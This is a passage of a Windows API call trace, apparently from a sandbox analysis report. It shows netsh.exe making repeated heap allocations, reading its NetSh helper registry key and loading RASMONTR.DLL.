0x2f0f10 [0120.410] GetProcessHeap () returned 0x2d0000 [0120.410] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0f30 [0120.411] GetProcessHeap () returned 0x2d0000 [0120.411] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0f50 [0120.411] GetProcessHeap () returned 0x2d0000 [0120.411] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0f70 [0120.411] GetProcessHeap () returned 0x2d0000 [0120.411] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0f90 [0120.411] GetProcessHeap () returned 0x2d0000 [0120.411] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0fb0 [0120.411] GetProcessHeap () returned 0x2d0000 [0120.411] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0fd0 [0120.411] GetProcessHeap () returned 0x2d0000 [0120.411] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f0ff0 [0120.411] GetProcessHeap () returned 0x2d0000 [0120.411] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1010 [0120.411] GetProcessHeap () returned 0x2d0000 [0120.411] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1030 [0120.411] GetProcessHeap () returned 0x2d0000 [0120.411] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1090 [0120.411] GetProcessHeap () returned 0x2d0000 [0120.411] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f10b0 [0120.411] GetProcessHeap () returned 0x2d0000 [0120.411] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f10d0 [0120.411] GetProcessHeap () returned 0x2d0000 [0120.411] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f10f0 [0120.411] GetProcessHeap () returned 0x2d0000 [0120.411] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1110 [0120.411] GetProcessHeap () returned 0x2d0000 [0120.411] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1130 [0120.411] GetProcessHeap () returned 0x2d0000 [0120.411] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1150 [0120.412] GetProcessHeap () returned 0x2d0000 [0120.412] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1170 [0120.412] GetProcessHeap () returned 0x2d0000 [0120.412] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1190 [0120.412] GetProcessHeap () returned 0x2d0000 [0120.412] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f11b0 [0120.412] GetProcessHeap () returned 0x2d0000 [0120.412] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f11d0 [0120.412] GetProcessHeap () returned 0x2d0000 [0120.412] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f11f0 [0120.412] GetProcessHeap () returned 0x2d0000 [0120.412] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1210 [0120.412] GetProcessHeap () returned 0x2d0000 [0120.412] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1230 [0120.412] GetProcessHeap () returned 0x2d0000 [0120.412] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1250 [0120.412] GetProcessHeap () returned 0x2d0000 [0120.412] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1270 [0120.412] GetProcessHeap () returned 0x2d0000 [0120.412] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1290 [0120.412] GetProcessHeap () returned 0x2d0000 [0120.412] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f12b0 [0120.412] GetProcessHeap () returned 0x2d0000 [0120.412] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f12d0 [0120.412] GetProcessHeap () returned 0x2d0000 [0120.412] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f12f0 [0120.412] GetProcessHeap () returned 0x2d0000 [0120.412] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1310 [0120.412] GetProcessHeap () returned 0x2d0000 [0120.412] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1330 [0120.412] GetProcessHeap () returned 0x2d0000 [0120.412] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1350 [0120.412] GetProcessHeap () returned 0x2d0000 [0120.413] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1370 [0120.413] GetProcessHeap () returned 0x2d0000 [0120.413] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1390 [0120.413] GetProcessHeap () returned 0x2d0000 [0120.413] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f13b0 [0120.413] GetProcessHeap () returned 0x2d0000 [0120.413] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f13d0 [0120.413] GetProcessHeap () returned 0x2d0000 [0120.413] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f13f0 [0120.413] GetProcessHeap () returned 0x2d0000 [0120.413] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1410 [0120.413] GetProcessHeap () returned 0x2d0000 [0120.413] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1430 [0120.413] GetProcessHeap () returned 0x2d0000 [0120.413] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1450 [0120.413] GetProcessHeap () returned 0x2d0000 [0120.413] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1470 [0120.413] GetProcessHeap () returned 0x2d0000 [0120.413] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1490 [0120.413] GetProcessHeap () returned 0x2d0000 [0120.413] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f14b0 [0120.413] GetProcessHeap () returned 0x2d0000 [0120.413] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f14d0 [0120.413] GetProcessHeap () returned 0x2d0000 [0120.413] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f14f0 [0120.413] GetProcessHeap () returned 0x2d0000 [0120.413] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1510 [0120.413] GetProcessHeap () returned 0x2d0000 [0120.413] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1530 [0120.413] GetProcessHeap () returned 0x2d0000 [0120.413] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1550 [0120.413] GetProcessHeap () returned 0x2d0000 [0120.413] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1570 [0120.414] GetProcessHeap () returned 0x2d0000 [0120.414] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1590 [0120.414] GetProcessHeap () returned 0x2d0000 [0120.414] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f15b0 [0120.414] GetProcessHeap () returned 0x2d0000 [0120.414] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f15d0 [0120.414] GetProcessHeap () returned 0x2d0000 [0120.414] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f15f0 [0120.414] GetProcessHeap () returned 0x2d0000 [0120.414] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1610 [0120.414] GetProcessHeap () returned 0x2d0000 [0120.414] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1630 [0120.414] GetProcessHeap () returned 0x2d0000 [0120.414] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1650 [0120.414] GetProcessHeap () returned 0x2d0000 [0120.414] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1670 [0120.414] GetProcessHeap () returned 0x2d0000 [0120.414] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1690 [0120.414] GetProcessHeap () returned 0x2d0000 [0120.414] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f16b0 [0120.414] GetProcessHeap () returned 0x2d0000 [0120.414] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f16d0 [0120.414] GetProcessHeap () returned 0x2d0000 [0120.414] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f16f0 [0120.414] GetProcessHeap () returned 0x2d0000 [0120.414] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1710 [0120.414] GetProcessHeap () returned 0x2d0000 [0120.414] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1730 [0120.414] GetProcessHeap () returned 0x2d0000 [0120.415] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1750 [0120.415] GetProcessHeap () returned 0x2d0000 [0120.415] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1770 [0120.415] GetProcessHeap () returned 0x2d0000 [0120.415] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1790 [0120.415] GetProcessHeap () returned 0x2d0000 [0120.415] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f17b0 [0120.415] GetProcessHeap () returned 0x2d0000 [0120.415] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f17d0 [0120.415] GetProcessHeap () returned 0x2d0000 [0120.415] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f17f0 [0120.415] GetProcessHeap () returned 0x2d0000 [0120.415] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1810 [0120.415] GetProcessHeap () returned 0x2d0000 [0120.415] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1830 [0120.415] GetProcessHeap () returned 0x2d0000 [0120.415] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1890 [0120.415] GetProcessHeap () returned 0x2d0000 [0120.415] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f18b0 [0120.415] GetProcessHeap () returned 0x2d0000 [0120.415] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f18d0 [0120.415] GetProcessHeap () returned 0x2d0000 [0120.416] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f18f0 [0120.416] GetProcessHeap () returned 0x2d0000 [0120.416] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1910 [0120.416] GetProcessHeap () returned 0x2d0000 [0120.416] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1930 [0120.416] GetProcessHeap () returned 0x2d0000 [0120.416] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1950 [0120.416] GetProcessHeap () returned 0x2d0000 [0120.416] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1970 [0120.416] GetProcessHeap () returned 0x2d0000 [0120.416] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1990 [0120.416] GetProcessHeap () returned 0x2d0000 [0120.416] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f19b0 [0120.416] GetProcessHeap () returned 0x2d0000 [0120.416] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f19d0 [0120.416] GetProcessHeap () returned 0x2d0000 [0120.416] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f19f0 [0120.416] GetProcessHeap () returned 0x2d0000 [0120.416] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1a10 [0120.416] GetProcessHeap () returned 0x2d0000 [0120.416] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1a30 [0120.416] GetProcessHeap () returned 0x2d0000 [0120.416] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1a50 [0120.416] GetProcessHeap () returned 0x2d0000 [0120.416] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1a70 [0120.417] GetProcessHeap () returned 0x2d0000 [0120.417] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1a90 [0120.417] GetProcessHeap () returned 0x2d0000 [0120.417] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1ab0 [0120.417] GetProcessHeap () returned 0x2d0000 [0120.417] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1ad0 [0120.417] GetProcessHeap () returned 0x2d0000 [0120.417] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1af0 [0120.417] GetProcessHeap () returned 0x2d0000 [0120.417] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1b10 [0120.417] GetProcessHeap () returned 0x2d0000 [0120.417] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1b30 [0120.417] GetProcessHeap () returned 0x2d0000 [0120.417] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1b50 [0120.417] GetProcessHeap () returned 0x2d0000 [0120.417] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1b70 [0120.417] GetProcessHeap () returned 0x2d0000 [0120.417] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1b90 [0120.417] GetProcessHeap () returned 0x2d0000 [0120.417] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1bb0 [0120.417] GetProcessHeap () returned 0x2d0000 [0120.417] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1bd0 [0120.417] GetProcessHeap () returned 0x2d0000 [0120.417] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1bf0 [0120.417] GetProcessHeap () returned 0x2d0000 [0120.417] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1c10 [0120.417] GetProcessHeap () returned 0x2d0000 [0120.417] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1c30 [0120.417] GetProcessHeap () returned 0x2d0000 [0120.417] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1c50 [0120.417] GetProcessHeap () returned 0x2d0000 [0120.417] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1c70 [0120.417] GetProcessHeap () returned 0x2d0000 [0120.417] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1c90 [0120.417] GetProcessHeap () returned 0x2d0000 [0120.418] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1cb0 [0120.418] GetProcessHeap () returned 0x2d0000 [0120.418] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1cd0 [0120.418] GetProcessHeap () returned 0x2d0000 [0120.418] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1cf0 [0120.418] GetProcessHeap () returned 0x2d0000 [0120.418] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1d10 [0120.418] GetProcessHeap () returned 0x2d0000 [0120.418] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1d30 [0120.418] GetProcessHeap () returned 0x2d0000 [0120.418] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1d50 [0120.418] GetProcessHeap () returned 0x2d0000 [0120.418] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1d70 [0120.418] GetProcessHeap () returned 0x2d0000 [0120.418] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1d90 [0120.418] GetProcessHeap () returned 0x2d0000 [0120.418] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1db0 [0120.418] GetProcessHeap () returned 0x2d0000 [0120.418] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1dd0 [0120.418] GetProcessHeap () returned 0x2d0000 [0120.418] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1df0 [0120.418] GetProcessHeap () returned 0x2d0000 [0120.418] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1e10 [0120.418] GetProcessHeap () returned 0x2d0000 [0120.418] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1e30 [0120.418] GetProcessHeap () returned 0x2d0000 [0120.418] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1e50 [0120.418] GetProcessHeap () returned 0x2d0000 [0120.418] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1e70 [0120.418] GetProcessHeap () returned 0x2d0000 [0120.419] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1e90 [0120.419] GetProcessHeap () returned 0x2d0000 [0120.419] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1eb0 [0120.419] GetProcessHeap () returned 0x2d0000 [0120.419] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1ed0 [0120.419] GetProcessHeap () returned 0x2d0000 [0120.419] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1ef0 [0120.419] GetProcessHeap () returned 0x2d0000 [0120.419] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1f10 [0120.419] GetProcessHeap () returned 0x2d0000 [0120.419] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1f30 [0120.419] GetProcessHeap () returned 0x2d0000 [0120.419] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1f50 [0120.419] GetProcessHeap () returned 0x2d0000 [0120.419] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1f70 [0120.419] GetProcessHeap () returned 0x2d0000 [0120.419] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1f90 [0120.419] GetProcessHeap () returned 0x2d0000 [0120.419] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1fb0 [0120.419] GetProcessHeap () returned 0x2d0000 [0120.419] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1fd0 [0120.419] GetProcessHeap () returned 0x2d0000 [0120.419] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f1ff0 [0120.419] GetProcessHeap () returned 0x2d0000 [0120.419] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2010 [0120.419] GetProcessHeap () returned 0x2d0000 [0120.419] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2030 [0120.419] GetProcessHeap () returned 0x2d0000 [0120.419] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2090 [0120.419] GetProcessHeap () returned 0x2d0000 [0120.420] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f20b0 [0120.420] GetProcessHeap () returned 0x2d0000 [0120.420] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f20d0 [0120.420] GetProcessHeap () returned 0x2d0000 [0120.420] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f20f0 [0120.420] GetProcessHeap () returned 0x2d0000 [0120.420] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2110 [0120.420] GetProcessHeap () returned 0x2d0000 [0120.420] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2130 [0120.420] GetProcessHeap () returned 0x2d0000 [0120.420] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2150 [0120.420] GetProcessHeap () returned 0x2d0000 [0120.420] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2170 [0120.420] GetProcessHeap () returned 0x2d0000 [0120.420] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2190 [0120.420] GetProcessHeap () returned 0x2d0000 [0120.420] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f21b0 [0120.420] GetProcessHeap () returned 0x2d0000 [0120.420] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f21d0 [0120.420] GetProcessHeap () returned 0x2d0000 [0120.420] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f21f0 [0120.420] GetProcessHeap () returned 0x2d0000 [0120.420] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2210 [0120.420] GetProcessHeap () returned 0x2d0000 [0120.420] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2230 [0120.420] GetProcessHeap () returned 0x2d0000 [0120.420] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2250 [0120.420] GetProcessHeap () returned 0x2d0000 [0120.420] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2270 [0120.420] GetProcessHeap () returned 0x2d0000 [0120.420] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f2290 [0120.420] GetProcessHeap () returned 0x2d0000 [0120.420] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f22b0 [0120.420] GetProcessHeap () returned 0x2d0000 [0120.420] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x10) returned 0x2f22d0 [0120.421] _wcsicmp (_String1="netsh.exe", _String2="ipxmontr.dll") returned 5 [0120.421] _wcsicmp (_String1="netsh.exe", _String2="ipxpromn.dll") returned 5 [0120.421] GetProcessHeap () returned 0x2d0000 [0120.421] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x28) returned 0x2ee030 [0120.421] GetProcessHeap () returned 0x2d0000 [0120.421] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x2) returned 0x2f2860 [0120.421] GetProcessHeap () returned 0x2d0000 [0120.421] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x14) returned 0x2f22f0 [0120.421] _wcsupr (in: _String="netsh.exe" | out: _String="NETSH.EXE") returned="NETSH.EXE" [0120.421] GetProcessHeap () returned 0x2d0000 [0120.421] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0120.421] GetProcessHeap () returned 0x2d0000 [0120.421] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x58) returned 0x2f2880 [0120.421] GetProcessHeap () returned 0x2d0000 [0120.421] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2d0000) returned 1 [0120.421] GetProcessHeap () returned 0x2d0000 [0120.421] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0xb0) returned 0x2f28e0 [0120.421] GetProcessHeap () returned 0x2d0000 [0120.421] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f2880 | out: hHeap=0x2d0000) returned 1 [0120.421] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\NetSh", ulOptions=0x0, samDesired=0x20019, phkResult=0x127828 | out: phkResult=0x127828*=0x90) returned 0x0 [0120.421] RegQueryInfoKeyW (in: hKey=0x90, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x127850, lpcbMaxValueNameLen=0x127860, lpcbMaxValueLen=0x127858, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x127850*=0x15, lpcbMaxValueNameLen=0x127860, lpcbMaxValueLen=0x127858, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0120.422] GetProcessHeap () returned 0x2d0000 [0120.422] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x16) returned 0x2f2310 [0120.422] GetProcessHeap () returned 0x2d0000 [0120.422] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x23) returned 0x2ee060 [0120.422] RegEnumValueW (in: hKey=0x90, dwIndex=0x0, lpValueName=0x2f2310, lpcchValueName=0x127820, lpReserved=0x0, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868 | out: lpValueName="4", lpcchValueName=0x127820, lpType=0x0, lpData=0x2ee060, lpcbData=0x127868) returned 0x0 [0120.422] _wcsicmp (_String1="rasmontr.dll", _String2="ipxmontr.dll") returned 9 [0120.422] _wcsicmp (_String1="rasmontr.dll", _String2="ipxpromn.dll") returned 9 [0120.422] GetProcessHeap () returned 0x2d0000 [0120.422] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x50) returned 0x2f2880 [0120.422] GetProcessHeap () returned 0x2d0000 [0120.422] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x4) returned 0x2f29a0 [0120.422] GetProcessHeap () returned 0x2d0000 [0120.422] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1a) returned 0x2ee090 [0120.422] _wcsupr (in: _String="rasmontr.dll" | out: _String="RASMONTR.DLL") returned="RASMONTR.DLL" [0120.422] GetProcessHeap () returned 0x2d0000 [0120.422] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ee030 | out: hHeap=0x2d0000) returned 1 [0120.422] LoadLibraryW (lpLibFileName="RASMONTR.DLL") returned 0x7fef2e80000 [0125.114] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x127220 | out: lpSystemTimeAsFileTime=0x127220*(dwLowDateTime=0xf7f99d00, dwHighDateTime=0x1d6a20a)) [0125.114] GetCurrentProcessId () returned 0xa70 [0125.114] GetCurrentThreadId () returned 0xa5c [0125.114] GetTickCount () returned 0x115407a [0125.114] RtlQueryPerformanceCounter (in: lpPerformanceCount=0x127228 | out: lpPerformanceCount=0x127228*=24516762847) returned 1 [0125.116] LoadLibraryA (lpLibFileName="MSVCRT.DLL") returned 0x7fefdee0000 [0125.116] GetVersion () returned 0x1db10106 [0125.116] SetErrorMode (uMode=0x0) returned 0x0 [0125.117] SetErrorMode (uMode=0x8001) returned 0x0 [0125.117] LocalAlloc (uFlags=0x0, uBytes=0x2000) returned 0x2f4330 [0125.118] 